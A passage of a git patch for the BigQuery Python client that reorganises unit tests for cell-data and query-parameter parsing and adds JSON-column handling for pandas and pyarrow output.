object_under_test.time_to_py("12:12:27.123456", object()) + assert coerced == datetime.time(12, 12, 27, 123456) + + +def test_time_to_py_w_bogus_string_value(object_under_test): + with pytest.raises(ValueError): + object_under_test.time_to_py("12:12:27.123", object()) + + +def test_range_to_py_w_wrong_format(object_under_test): + range_field = create_field( + "NULLABLE", + "RANGE", + range_element_type="DATE", + ) + with pytest.raises(ValueError): + object_under_test.range_to_py("[2009-06-172019-06-17)", range_field) + + +def test_range_to_py_w_wrong_element_type(object_under_test): + range_field = create_field( + "NULLABLE", + "RANGE", + range_element_type=google.cloud.bigquery.schema.FieldElementType( + element_type="TIME" + ), + ) + with pytest.raises(ValueError): + object_under_test.range_to_py("[15:31:38, 15:50:38)", range_field) + + +def test_range_to_py_w_unbounded_value(object_under_test): + range_field = create_field( + "NULLABLE", + "RANGE", + range_element_type="DATE", + ) + coerced = object_under_test.range_to_py("[UNBOUNDED, 2019-06-17)", range_field) + assert coerced == {"start": None, "end": datetime.date(2019, 6, 17)} + + +def test_range_to_py_w_date_value(object_under_test): + range_field = create_field( + "NULLABLE", + "RANGE", + range_element_type="DATE", + ) + coerced = object_under_test.range_to_py("[2009-06-17, 2019-06-17)", range_field) + assert coerced == { + "start": datetime.date(2009, 6, 17), + "end": datetime.date(2019, 6, 17), + } + + +def test_range_to_py_w_datetime_value(object_under_test): + range_field = create_field( + "NULLABLE", + "RANGE", + range_element_type=google.cloud.bigquery.schema.FieldElementType( + element_type="DATETIME" + ), + ) + coerced = object_under_test.range_to_py( + "[2009-06-17T13:45:30, 2019-06-17T13:45:30)", range_field + ) + assert coerced == { + "start": datetime.datetime(2009, 6, 17, 13, 45, 30), + "end": datetime.datetime(2019, 6, 17, 13, 45, 30), + } + + +def test_range_to_py_w_timestamp_value(object_under_test): + from google.cloud._helpers import _EPOCH + + range_field = create_field( + "NULLABLE", + "RANGE", + range_element_type=google.cloud.bigquery.schema.FieldElementType( + element_type="TIMESTAMP" + ), + ) + coerced = object_under_test.range_to_py("[1234567, 1234789)", range_field) + assert coerced == { + "start": _EPOCH + datetime.timedelta(seconds=1, microseconds=234567), + "end": _EPOCH + datetime.timedelta(seconds=1, microseconds=234789), + } + + +def test_record_to_py_w_nullable_subfield_none(object_under_test): + subfield = create_field("NULLABLE", "INTEGER", name="age") + field = create_field("REQUIRED", fields=[subfield]) + value = {"f": [{"v": None}]} + coerced = object_under_test.record_to_py(value, field) + assert coerced == {"age": None} + + +def test_record_to_py_w_scalar_subfield(object_under_test): + subfield = create_field("REQUIRED", "INTEGER", name="age") + field = create_field("REQUIRED", fields=[subfield]) + value = {"f": [{"v": 42}]} + coerced = object_under_test.record_to_py(value, field) + assert coerced == {"age": 42} + + +def test_record_to_py_w_scalar_subfield_geography(object_under_test): + subfield = create_field("REQUIRED", "GEOGRAPHY", name="geo") + field = create_field("REQUIRED", fields=[subfield]) + value = {"f": [{"v": "POINT(1, 2)"}]} + coerced = object_under_test.record_to_py(value, field) + assert coerced == {"geo": "POINT(1, 2)"} + + +def test_record_to_py_w_repeated_subfield(object_under_test): + subfield = create_field("REPEATED", "STRING", name="color") + field = create_field("REQUIRED", fields=[subfield]) + value = {"f": [{"v": [{"v": "red"}, {"v": "yellow"}, {"v": "blue"}]}]} + coerced = object_under_test.record_to_py(value, field) + assert coerced == {"color": ["red", "yellow", "blue"]} + + +def test_record_to_py_w_record_subfield(object_under_test): + full_name = create_field("REQUIRED", "STRING", name="full_name") + area_code = create_field("REQUIRED", "STRING", name="area_code") + local_number = create_field("REQUIRED", "STRING", name="local_number") + rank = create_field("REQUIRED", "INTEGER", name="rank") + phone = create_field( + "NULLABLE", "RECORD", name="phone", fields=[area_code, local_number, rank] + ) + person = create_field( + "REQUIRED", "RECORD", name="person", fields=[full_name, phone] + ) + value = { + "f": [ + {"v": "Phred Phlyntstone"}, + {"v": {"f": [{"v": "800"}, {"v": "555-1212"}, {"v": 1}]}}, + ] + } + expected = { + "full_name": "Phred Phlyntstone", + "phone": {"area_code": "800", "local_number": "555-1212", "rank": 1}, + } + coerced = object_under_test.record_to_py(value, person) + assert coerced == expected diff --git a/tests/unit/_helpers/test_from_json.py b/tests/unit/_helpers/test_from_json.py deleted file mode 100644 index 65b054f44..000000000 --- a/tests/unit/_helpers/test_from_json.py +++ /dev/null @@ -1,157 +0,0 @@ -# Copyright 2021 Google LLC -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. - -from dateutil.relativedelta import relativedelta -import pytest - -from google.cloud.bigquery.schema import SchemaField - - -def create_field(mode="NULLABLE", type_="IGNORED"): - return SchemaField("test_field", type_, mode=mode) - - -@pytest.fixture -def mut(): - from google.cloud.bigquery import _helpers - - return _helpers - - -def test_interval_from_json_w_none_nullable(mut): - got = mut._interval_from_json(None, create_field()) - assert got is None - - -def test_interval_from_json_w_none_required(mut): - with pytest.raises(TypeError): - mut._interval_from_json(None, create_field(mode="REQUIRED")) - - -def test_interval_from_json_w_invalid_format(mut): - with pytest.raises(ValueError, match="NOT_AN_INTERVAL"): - mut._interval_from_json("NOT_AN_INTERVAL", create_field()) - - -@pytest.mark.parametrize( - ("value", "expected"), - ( - ("0-0 0 0:0:0", relativedelta()), - # SELECT INTERVAL X YEAR - ("-10000-0 0 0:0:0", relativedelta(years=-10000)), - ("-1-0 0 0:0:0", relativedelta(years=-1)), - ("1-0 0 0:0:0", relativedelta(years=1)), - ("10000-0 0 0:0:0", relativedelta(years=10000)), - # SELECT INTERVAL X MONTH - ("-0-11 0 0:0:0", relativedelta(months=-11)), - ("-0-1 0 0:0:0", relativedelta(months=-1)), - ("0-1 0 0:0:0", relativedelta(months=1)), - ("0-11 0 0:0:0", relativedelta(months=11)), - # SELECT INTERVAL X DAY - ("0-0 -3660000 0:0:0", relativedelta(days=-3660000)), - ("0-0 -1 0:0:0", relativedelta(days=-1)), - ("0-0 1 0:0:0", relativedelta(days=1)), - ("0-0 3660000 0:0:0", relativedelta(days=3660000)), - # SELECT INTERVAL X HOUR - ("0-0 0 -87840000:0:0", relativedelta(hours=-87840000)), - ("0-0 0 -1:0:0", relativedelta(hours=-1)), - ("0-0 0 1:0:0", relativedelta(hours=1)), - ("0-0 0 87840000:0:0", relativedelta(hours=87840000)), - # SELECT INTERVAL X MINUTE - ("0-0 0 -0:59:0", relativedelta(minutes=-59)), - ("0-0 0 -0:1:0", relativedelta(minutes=-1)), - ("0-0 0 0:1:0", relativedelta(minutes=1)), - ("0-0 0 0:59:0", relativedelta(minutes=59)), - # SELECT INTERVAL X SECOND - ("0-0 0 -0:0:59", relativedelta(seconds=-59)), - ("0-0 0 -0:0:1", relativedelta(seconds=-1)), - ("0-0 0 0:0:1", relativedelta(seconds=1)), - ("0-0 0 0:0:59", relativedelta(seconds=59)), - # SELECT (INTERVAL -1 SECOND) / 1000000 - ("0-0 0 -0:0:0.000001", relativedelta(microseconds=-1)), - ("0-0 0 -0:0:59.999999", relativedelta(seconds=-59, microseconds=-999999)), - ("0-0 0 -0:0:59.999", relativedelta(seconds=-59, microseconds=-999000)), - ("0-0 0 0:0:59.999", relativedelta(seconds=59, microseconds=999000)), - ("0-0 0 0:0:59.999999", relativedelta(seconds=59, microseconds=999999)), - # Test with multiple digits in each section. - ( - "32-11 45 67:16:23.987654", - relativedelta( - years=32, - months=11, - days=45, - hours=67, - minutes=16, - seconds=23, - microseconds=987654, - ), - ), - ( - "-32-11 -45 -67:16:23.987654", - relativedelta( - years=-32, - months=-11, - days=-45, - hours=-67, - minutes=-16, - seconds=-23, - microseconds=-987654, - ), - ), - # Test with mixed +/- sections. - ( - "9999-9 -999999 9999999:59:59.999999", - relativedelta( - years=9999, - months=9, - days=-999999, - hours=9999999, - minutes=59, - seconds=59, - microseconds=999999, - ), - ), - # Test with fraction that is not microseconds. - ("0-0 0 0:0:42.", relativedelta(seconds=42)), - ("0-0 0 0:0:59.1", relativedelta(seconds=59, microseconds=100000)), - ("0-0 0 0:0:0.12", relativedelta(microseconds=120000)), - ("0-0 0 0:0:0.123", relativedelta(microseconds=123000)), - ("0-0 0 0:0:0.1234", relativedelta(microseconds=123400)), - # Fractional seconds can cause rounding problems if cast to float. See: - # https://github.com/googleapis/python-db-dtypes-pandas/issues/18 - ("0-0 0 0:0:59.876543", relativedelta(seconds=59, microseconds=876543)), - ( - "0-0 0 01:01:01.010101", - relativedelta(hours=1, minutes=1, seconds=1, microseconds=10101), - ), - ( - "0-0 0 09:09:09.090909", - relativedelta(hours=9, minutes=9, seconds=9, microseconds=90909), - ), - ( - "0-0 0 11:11:11.111111", - relativedelta(hours=11, minutes=11, seconds=11, microseconds=111111), - ), - ( - "0-0 0 19:16:23.987654", - relativedelta(hours=19, minutes=16, seconds=23, microseconds=987654), - ), - # Nanoseconds are not expected, but should not cause error. - ("0-0 0 0:0:00.123456789", relativedelta(microseconds=123456)), - ("0-0 0 0:0:59.87654321", relativedelta(seconds=59, microseconds=876543)), - ), -) -def test_w_string_values(mut, value, expected): - got = mut._interval_from_json(value, create_field()) - assert got == expected diff --git a/tests/unit/_helpers/test_scalar_query_param_parser.py b/tests/unit/_helpers/test_scalar_query_param_parser.py new file mode 100644 index 000000000..8e0d2a34e --- /dev/null +++ b/tests/unit/_helpers/test_scalar_query_param_parser.py @@ -0,0 +1,93 @@ +# Copyright 2025 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +import datetime + +import pytest + +import google.cloud.bigquery.schema + + +def create_field(mode="NULLABLE", type_="IGNORED"): + return google.cloud.bigquery.schema.SchemaField("test_field", type_, mode=mode) + + +@pytest.fixture +def mut(): + from google.cloud.bigquery import _helpers + + return _helpers + + +@pytest.fixture +def object_under_test(mut): + return mut.SCALAR_QUERY_PARAM_PARSER + + +def test_timestamp_to_py_w_none_nullable(object_under_test): + assert object_under_test.timestamp_to_py(None, create_field()) is None + + +@pytest.mark.parametrize( + ("value", "expected"), + [ + ( + "2016-12-20 15:58:27.339328+00:00", + datetime.datetime( + 2016, 12, 20, 15, 58, 27, 339328, tzinfo=datetime.timezone.utc + ), + ), + ( + "2016-12-20 15:58:27+00:00", + datetime.datetime(2016, 12, 20, 15, 58, 27, tzinfo=datetime.timezone.utc), + ), + ( + "2016-12-20T15:58:27.339328+00:00", + datetime.datetime( + 2016, 12, 20, 15, 58, 27, 339328, tzinfo=datetime.timezone.utc + ), + ), + ( + "2016-12-20T15:58:27+00:00", + datetime.datetime(2016, 12, 20, 15, 58, 27, tzinfo=datetime.timezone.utc), + ), + ( + "2016-12-20 15:58:27.339328Z", + datetime.datetime( + 2016, 12, 20, 15, 58, 27, 339328, tzinfo=datetime.timezone.utc + ), + ), + ( + "2016-12-20 15:58:27Z", + datetime.datetime(2016, 12, 20, 15, 58, 27, tzinfo=datetime.timezone.utc), + ), + ( + "2016-12-20T15:58:27.339328Z", + datetime.datetime( + 2016, 12, 20, 15, 58, 27, 339328, tzinfo=datetime.timezone.utc + ), + ), + ( + "2016-12-20T15:58:27Z", + datetime.datetime(2016, 12, 20, 15, 58, 27, tzinfo=datetime.timezone.utc), + ), + ], +) +def test_timestamp_to_py_w_timestamp_valid(object_under_test, value, expected): + assert object_under_test.timestamp_to_py(value, create_field()) == expected + + +def test_timestamp_to_py_w_timestamp_invalid(object_under_test): + with pytest.raises(ValueError): + object_under_test.timestamp_to_py("definitely-not-a-timestamp", create_field()) diff --git a/tests/unit/test__helpers.py b/tests/unit/test__helpers.py index adba6327c..4e53236e3 100644 --- a/tests/unit/test__helpers.py +++ b/tests/unit/test__helpers.py @@ -12,7 +12,6 @@ # See the License for the specific language governing permissions and # limitations under the License. -import base64 import datetime import decimal import json @@ -133,484 +132,6 @@ def test_w_value(self): self.assertTrue(self._call_fut(object(), object())) -class Test_int_from_json(unittest.TestCase): - def _call_fut(self, value, field): - from google.cloud.bigquery._helpers import _int_from_json - - return _int_from_json(value, field) - - def test_w_none_nullable(self): - self.assertIsNone(self._call_fut(None, _Field("NULLABLE"))) - - def test_w_none_required(self): - with self.assertRaises(TypeError): - self._call_fut(None, _Field("REQUIRED")) - - def test_w_string_value(self): - coerced = self._call_fut("42", object()) - self.assertEqual(coerced, 42) - - def test_w_float_value(self): - coerced = self._call_fut(42, object()) - self.assertEqual(coerced, 42) - - -class Test_json_from_json(unittest.TestCase): - def _call_fut(self, value, field): - from google.cloud.bigquery._helpers import _json_from_json - - return _json_from_json(value, field) - - def test_w_none_nullable(self): - self.assertIsNone(self._call_fut(None, _Field("NULLABLE"))) - - def test_w_none_required(self): - with self.assertRaises(TypeError): - self._call_fut(None, _Field("REQUIRED")) - - def test_w_json_field(self): - data_field = _Field("REQUIRED", "data", "JSON") - - value = json.dumps( - {"v": {"key": "value"}}, - ) - - expected_output = {"v": {"key": "value"}} - coerced_output = self._call_fut(value, data_field) - self.assertEqual(coerced_output, expected_output) - - def test_w_string_value(self): - coerced = self._call_fut('"foo"', object()) - self.assertEqual(coerced, "foo") - - -class Test_float_from_json(unittest.TestCase): - def _call_fut(self, value, field): - from google.cloud.bigquery._helpers import _float_from_json - - return _float_from_json(value, field) - - def test_w_none_nullable(self): - self.assertIsNone(self._call_fut(None, _Field("NULLABLE"))) - - def test_w_none_required(self): - with self.assertRaises(TypeError): - self._call_fut(None, _Field("REQUIRED")) - - def test_w_string_value(self): - coerced = self._call_fut("3.1415", object()) - self.assertEqual(coerced, 3.1415) - - def test_w_float_value(self): - coerced = self._call_fut(3.1415, object()) - self.assertEqual(coerced, 3.1415) - - -class Test_decimal_from_json(unittest.TestCase): - def _call_fut(self, value, field): - from google.cloud.bigquery._helpers import _decimal_from_json - - return _decimal_from_json(value, field) - - def test_w_none_nullable(self): - self.assertIsNone(self._call_fut(None, _Field("NULLABLE"))) - - def test_w_none_required(self): - with self.assertRaises(TypeError): - self._call_fut(None, _Field("REQUIRED")) - - def test_w_string_value(self): - coerced = self._call_fut("3.1415", object()) - self.assertEqual(coerced, decimal.Decimal("3.1415")) - - def test_w_float_value(self): - coerced = self._call_fut(3.1415, object()) - # There is no exact float representation of 3.1415. - self.assertEqual(coerced, decimal.Decimal(3.1415)) - - -class Test_bool_from_json(unittest.TestCase): - def _call_fut(self, value, field): - from google.cloud.bigquery._helpers import _bool_from_json - - return _bool_from_json(value, field) - - def test_w_none_nullable(self): - self.assertIsNone(self._call_fut(None, _Field("NULLABLE"))) - - def test_w_none_required(self): - with self.assertRaises(AttributeError): - self._call_fut(None, _Field("REQUIRED")) - - def test_w_value_t(self): - coerced = self._call_fut("T", object()) - self.assertTrue(coerced) - - def test_w_value_true(self): - coerced = self._call_fut("True", object()) - self.assertTrue(coerced) - - def test_w_value_1(self): - coerced = self._call_fut("1", object()) - self.assertTrue(coerced) - - def test_w_value_other(self): - coerced = self._call_fut("f", object()) - self.assertFalse(coerced) - - -class Test_string_from_json(unittest.TestCase): - def _call_fut(self, value, field): - from google.cloud.bigquery._helpers import _string_from_json - - return _string_from_json(value, field) - - def test_w_none_nullable(self): - self.assertIsNone(self._call_fut(None, _Field("NULLABLE"))) - - def test_w_none_required(self): - self.assertIsNone(self._call_fut(None, _Field("REQUIRED"))) - - def test_w_string_value(self): - coerced = self._call_fut("Wonderful!", object()) - self.assertEqual(coerced, "Wonderful!") - - -class Test_bytes_from_json(unittest.TestCase): - def _call_fut(self, value, field): - from google.cloud.bigquery._helpers import _bytes_from_json - - return _bytes_from_json(value, field) - - def test_w_none_nullable(self): - self.assertIsNone(self._call_fut(None, _Field("NULLABLE"))) - - def test_w_none_required(self): - with self.assertRaises(TypeError): - self._call_fut(None, _Field("REQUIRED")) - - def test_w_base64_encoded_bytes(self): - expected = b"Wonderful!" - encoded = base64.standard_b64encode(expected) - coerced = self._call_fut(encoded, object()) - self.assertEqual(coerced, expected) - - def test_w_base64_encoded_text(self): - expected = b"Wonderful!" - encoded = base64.standard_b64encode(expected).decode("ascii") - coerced = self._call_fut(encoded, object()) - self.assertEqual(coerced, expected) - - -class Test_timestamp_from_json(unittest.TestCase): - def _call_fut(self, value, field): - from google.cloud.bigquery._helpers import _timestamp_from_json - - return _timestamp_from_json(value, field) - - def test_w_none_nullable(self): - self.assertIsNone(self._call_fut(None, _Field("NULLABLE"))) - - def test_w_none_required(self): - with self.assertRaises(TypeError): - self._call_fut(None, _Field("REQUIRED")) - - def test_w_string_int_value(self): - from google.cloud._helpers import _EPOCH - - coerced = self._call_fut("1234567", object()) - self.assertEqual( - coerced, _EPOCH + datetime.timedelta(seconds=1, microseconds=234567) - ) - - def test_w_int_value(self): - from google.cloud._helpers import _EPOCH - - coerced = self._call_fut(1234567, object()) - self.assertEqual( - coerced, _EPOCH + datetime.timedelta(seconds=1, microseconds=234567) - ) - - -class Test_timestamp_query_param_from_json(unittest.TestCase): - def _call_fut(self, value, field): - from google.cloud.bigquery import _helpers - - return _helpers._timestamp_query_param_from_json(value, field) - - def test_w_none_nullable(self): - self.assertIsNone(self._call_fut(None, _Field("NULLABLE"))) - - def test_w_timestamp_valid(self): - from google.cloud._helpers import UTC - - samples = [ - ( - "2016-12-20 15:58:27.339328+00:00", - datetime.datetime(2016, 12, 20, 15, 58, 27, 339328, tzinfo=UTC), - ), - ( - "2016-12-20 15:58:27+00:00", - datetime.datetime(2016, 12, 20, 15, 58, 27, tzinfo=UTC), - ), - ( - "2016-12-20T15:58:27.339328+00:00", - datetime.datetime(2016, 12, 20, 15, 58, 27, 339328, tzinfo=UTC), - ), - ( - "2016-12-20T15:58:27+00:00", - datetime.datetime(2016, 12, 20, 15, 58, 27, tzinfo=UTC), - ), - ( - "2016-12-20 15:58:27.339328Z", - datetime.datetime(2016, 12, 20, 15, 58, 27, 339328, tzinfo=UTC), - ), - ( - "2016-12-20 15:58:27Z", - datetime.datetime(2016, 12, 20, 15, 58, 27, tzinfo=UTC), - ), - ( - "2016-12-20T15:58:27.339328Z", - datetime.datetime(2016, 12, 20, 15, 58, 27, 339328, tzinfo=UTC), - ), - ( - "2016-12-20T15:58:27Z", - datetime.datetime(2016, 12, 20, 15, 58, 27, tzinfo=UTC), - ), - ] - for timestamp_str, expected_result in samples: - self.assertEqual( - self._call_fut(timestamp_str, _Field("NULLABLE")), expected_result - ) - - def test_w_timestamp_invalid(self): - with self.assertRaises(ValueError): - self._call_fut("definitely-not-a-timestamp", _Field("NULLABLE")) - - -class Test_datetime_from_json(unittest.TestCase): - def _call_fut(self, value, field): - from google.cloud.bigquery._helpers import _datetime_from_json - - return _datetime_from_json(value, field) - - def test_w_none_nullable(self): - self.assertIsNone(self._call_fut(None, _Field("NULLABLE"))) - - def test_w_none_required(self): - with self.assertRaises(TypeError): - self._call_fut(None, _Field("REQUIRED")) - - def test_w_string_value(self): - coerced = self._call_fut("2016-12-02T18:51:33", object()) - self.assertEqual(coerced, datetime.datetime(2016, 12, 2, 18, 51, 33)) - - def test_w_microseconds(self): - coerced = self._call_fut("2015-05-22T10:11:12.987654", object()) - self.assertEqual(coerced, datetime.datetime(2015, 5, 22, 10, 11, 12, 987654)) - - -class Test_date_from_json(unittest.TestCase): - def _call_fut(self, value, field): - from google.cloud.bigquery._helpers import _date_from_json - - return _date_from_json(value, field) - - def test_w_none_nullable(self): - self.assertIsNone(self._call_fut(None, _Field("NULLABLE"))) - - def test_w_none_required(self): - with self.assertRaises(TypeError): - self._call_fut(None, _Field("REQUIRED")) - - def test_w_string_value(self): - coerced = self._call_fut("1987-09-22", object()) - self.assertEqual(coerced, datetime.date(1987, 9, 22)) - - -class Test_time_from_json(unittest.TestCase): - def _call_fut(self, value, field): - from google.cloud.bigquery._helpers import _time_from_json - - return _time_from_json(value, field) - - def test_w_none_nullable(self): - self.assertIsNone(self._call_fut(None, _Field("NULLABLE"))) - - def test_w_none_required(self): - with self.assertRaises(TypeError): - self._call_fut(None, _Field("REQUIRED")) - - def test_w_string_value(self): - coerced = self._call_fut("12:12:27", object()) - self.assertEqual(coerced, datetime.time(12, 12, 27)) - - def test_w_subsecond_string_value(self): - coerced = self._call_fut("12:12:27.123456", object()) - self.assertEqual(coerced, datetime.time(12, 12, 27, 123456)) - - def test_w_bogus_string_value(self): - with self.assertRaises(ValueError): - self._call_fut("12:12:27.123", object()) - - -class Test_range_from_json(unittest.TestCase): - def _call_fut(self, value, field): - from google.cloud.bigquery._helpers import _range_from_json - - return _range_from_json(value, field) - - def test_w_none_nullable(self): - self.assertIsNone(self._call_fut(None, _Field("NULLABLE"))) - - def test_w_none_required(self): - with self.assertRaises(TypeError): - self._call_fut(None, _Field("REQUIRED")) - - def test_w_wrong_format(self): - range_field = _Field( - "NULLABLE", - field_type="RANGE", - range_element_type=_Field("NULLABLE", element_type="DATE"), - ) - with self.assertRaises(ValueError): - self._call_fut("[2009-06-172019-06-17)", range_field) - - def test_w_wrong_element_type(self): - range_field = _Field( - "NULLABLE", - field_type="RANGE", - range_element_type=_Field("NULLABLE", element_type="TIME"), - ) - with self.assertRaises(ValueError): - self._call_fut("[15:31:38, 15:50:38)", range_field) - - def test_w_unbounded_value(self): - range_field = _Field( - "NULLABLE", - field_type="RANGE", - range_element_type=_Field("NULLABLE", element_type="DATE"), - ) - coerced = self._call_fut("[UNBOUNDED, 2019-06-17)", range_field) - self.assertEqual( - coerced, - {"start": None, "end": datetime.date(2019, 6, 17)}, - ) - - def test_w_date_value(self): - range_field = _Field( - "NULLABLE", - field_type="RANGE", - range_element_type=_Field("NULLABLE", element_type="DATE"), - ) - coerced = self._call_fut("[2009-06-17, 2019-06-17)", range_field) - self.assertEqual( - coerced, - { - "start": datetime.date(2009, 6, 17), - "end": datetime.date(2019, 6, 17), - }, - ) - - def test_w_datetime_value(self): - range_field = _Field( - "NULLABLE", - field_type="RANGE", - range_element_type=_Field("NULLABLE", element_type="DATETIME"), - ) - coerced = self._call_fut( - "[2009-06-17T13:45:30, 2019-06-17T13:45:30)", range_field - ) - self.assertEqual( - coerced, - { - "start": datetime.datetime(2009, 6, 17, 13, 45, 30), - "end": datetime.datetime(2019, 6, 17, 13, 45, 30), - }, - ) - - def test_w_timestamp_value(self): - from google.cloud._helpers import _EPOCH - - range_field = _Field( - "NULLABLE", - field_type="RANGE", - range_element_type=_Field("NULLABLE", element_type="TIMESTAMP"), - ) - coerced = self._call_fut("[1234567, 1234789)", range_field) - self.assertEqual( - coerced, - { - "start": _EPOCH + datetime.timedelta(seconds=1, microseconds=234567), - "end": _EPOCH + datetime.timedelta(seconds=1, microseconds=234789), - }, - ) - - -class Test_record_from_json(unittest.TestCase): - def _call_fut(self, value, field): - from google.cloud.bigquery._helpers import _record_from_json - - return _record_from_json(value, field) - - def test_w_none_nullable(self): - self.assertIsNone(self._call_fut(None, _Field("NULLABLE"))) - - def test_w_none_required(self): - with self.assertRaises(TypeError): - self._call_fut(None, _Field("REQUIRED")) - - def test_w_nullable_subfield_none(self): - subfield = _Field("NULLABLE", "age", "INTEGER") - field = _Field("REQUIRED", fields=[subfield]) - value = {"f": [{"v": None}]} - coerced = self._call_fut(value, field) - self.assertEqual(coerced, {"age": None}) - - def test_w_scalar_subfield(self): - subfield = _Field("REQUIRED", "age", "INTEGER") - field = _Field("REQUIRED", fields=[subfield]) - value = {"f": [{"v": 42}]} - coerced = self._call_fut(value, field) - self.assertEqual(coerced, {"age": 42}) - - def test_w_scalar_subfield_geography(self): - subfield = _Field("REQUIRED", "geo", "GEOGRAPHY") - field = _Field("REQUIRED", fields=[subfield]) - value = {"f": [{"v": "POINT(1, 2)"}]} - coerced = self._call_fut(value, field) - self.assertEqual(coerced, {"geo": "POINT(1, 2)"}) - - def test_w_repeated_subfield(self): - subfield = _Field("REPEATED", "color", "STRING") - field = _Field("REQUIRED", fields=[subfield]) - value = {"f": [{"v": [{"v": "red"}, {"v": "yellow"}, {"v": "blue"}]}]} - coerced = self._call_fut(value, field) - self.assertEqual(coerced, {"color": ["red", "yellow", "blue"]}) - - def test_w_record_subfield(self): - full_name = _Field("REQUIRED", "full_name", "STRING") - area_code = _Field("REQUIRED", "area_code", "STRING") - local_number = _Field("REQUIRED", "local_number", "STRING") - rank = _Field("REQUIRED", "rank", "INTEGER") - phone = _Field( - "NULLABLE", "phone", "RECORD", fields=[area_code, local_number, rank] - ) - person = _Field("REQUIRED", "person", "RECORD", fields=[full_name, phone]) - value = { - "f": [ - {"v": "Phred Phlyntstone"}, - {"v": {"f": [{"v": "800"}, {"v": "555-1212"}, {"v": 1}]}}, - ] - } - expected = { - "full_name": "Phred Phlyntstone", - "phone": {"area_code": "800", "local_number": "555-1212", "rank": 1}, - } - coerced = self._call_fut(value, person) - self.assertEqual(coerced, expected) - - class Test_field_to_index_mapping(unittest.TestCase): def _call_fut(self, schema): from google.cloud.bigquery._helpers import _field_to_index_mapping From 968020d5be9d2a30b90d046eaf52f91bb2c70911 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Tim=20Swe=C3=B1a=20=28Swast=29?= Date: Thu, 20 Mar 2025 11:08:48 -0500 Subject: [PATCH 077/202] fix: avoid "Unable to determine type" warning with JSON columns in `to_dataframe` (#1876) * add regression tests for empty dataframe * fix arrow test to be compatible with old pyarrow --- google/cloud/bigquery/_helpers.py | 15 ++++ google/cloud/bigquery/_pandas_helpers.py | 1 + google/cloud/bigquery/_pyarrow_helpers.py | 26 ++++++- google/cloud/bigquery/table.py | 4 +- tests/system/test_arrow.py | 29 ++++++++ tests/system/test_pandas.py | 26 +++++++ .../test_data_frame_cell_data_parser.py | 71 +++++++++++++++++++ tests/unit/test__pyarrow_helpers.py | 12 +++- tests/unit/test_table_arrow.py | 66 +++++++++++------ tests/unit/test_table_pandas.py | 4 ++ 10 files changed, 230 insertions(+), 24 deletions(-) create mode 100644 tests/unit/_helpers/test_data_frame_cell_data_parser.py diff --git a/google/cloud/bigquery/_helpers.py b/google/cloud/bigquery/_helpers.py index 4ba3ccf93..76c4f1fbd 100644 --- a/google/cloud/bigquery/_helpers.py +++ b/google/cloud/bigquery/_helpers.py @@ -387,6 +387,21 @@ def range_to_py(self, value, field): CELL_DATA_PARSER = CellDataParser() +class DataFrameCellDataParser(CellDataParser): + """Override of CellDataParser to handle differences in expection of values in DataFrame-like outputs. + + This is used to turn the output of the REST API into a pyarrow Table, + emulating the serialized arrow from the BigQuery Storage Read API. + """ + + def json_to_py(self, value, _): + """No-op because DataFrame expects string for JSON output.""" + return value + + +DATA_FRAME_CELL_DATA_PARSER = DataFrameCellDataParser() + + class ScalarQueryParamParser(CellDataParser): """Override of CellDataParser to handle the differences in the response from query params. diff --git a/google/cloud/bigquery/_pandas_helpers.py b/google/cloud/bigquery/_pandas_helpers.py index feb6b3adb..457eb9078 100644 --- a/google/cloud/bigquery/_pandas_helpers.py +++ b/google/cloud/bigquery/_pandas_helpers.py @@ -158,6 +158,7 @@ def finish(self): b"ARROW:extension:metadata": b'{"encoding": "WKT"}', }, "DATETIME": {b"ARROW:extension:name": b"google:sqlType:datetime"}, + "JSON": {b"ARROW:extension:name": b"google:sqlType:json"}, } diff --git a/google/cloud/bigquery/_pyarrow_helpers.py b/google/cloud/bigquery/_pyarrow_helpers.py index 034e020ee..03c70bf63 100644 --- a/google/cloud/bigquery/_pyarrow_helpers.py +++ b/google/cloud/bigquery/_pyarrow_helpers.py @@ -15,7 +15,9 @@ """Shared helper functions for connecting BigQuery and pyarrow. NOTE: This module is DEPRECATED. Please make updates in the pandas-gbq package, -instead. See: go/pandas-gbq-and-bigframes-redundancy and +instead. See: go/pandas-gbq-and-bigframes-redundancy, +https://github.com/googleapis/python-bigquery-pandas/blob/main/pandas_gbq/schema/bigquery_to_pyarrow.py +and https://github.com/googleapis/python-bigquery-pandas/blob/main/pandas_gbq/schema/pyarrow_to_bigquery.py """ @@ -26,6 +28,14 @@ except ImportError: pyarrow = None +try: + import db_dtypes # type: ignore + + db_dtypes_import_exception = None +except ImportError as exc: + db_dtypes = None + db_dtypes_import_exception = exc + def pyarrow_datetime(): return pyarrow.timestamp("us", tz=None) @@ -67,12 +77,18 @@ def pyarrow_timestamp(): "GEOGRAPHY": pyarrow.string, "INT64": pyarrow.int64, "INTEGER": pyarrow.int64, + # Normally, we'd prefer JSON type built-in to pyarrow (added in 19.0.0), + # but we'd like this to map as closely to the BQ Storage API as + # possible, which uses the string() dtype, as JSON support in Arrow + # predates JSON support in BigQuery by several years. + "JSON": pyarrow.string, "NUMERIC": pyarrow_numeric, "STRING": pyarrow.string, "TIME": pyarrow_time, "TIMESTAMP": pyarrow_timestamp, } + # DEPRECATED: update pandas_gbq.schema.pyarrow_to_bigquery, instead. _ARROW_SCALAR_IDS_TO_BQ = { # https://arrow.apache.org/docs/python/api/datatypes.html#type-classes pyarrow.bool_().id: "BOOL", @@ -97,6 +113,9 @@ def pyarrow_timestamp(): pyarrow.large_string().id: "STRING", # The exact scale and precision don't matter, see below. pyarrow.decimal128(38, scale=9).id: "NUMERIC", + # NOTE: all extension types (e.g. json_, uuid, db_dtypes.JSONArrowType) + # have the same id (31 as of version 19.0.1), so these should not be + # matched by id. } _BQ_TO_ARROW_SCALARS["BIGNUMERIC"] = pyarrow_bignumeric @@ -107,6 +126,9 @@ def 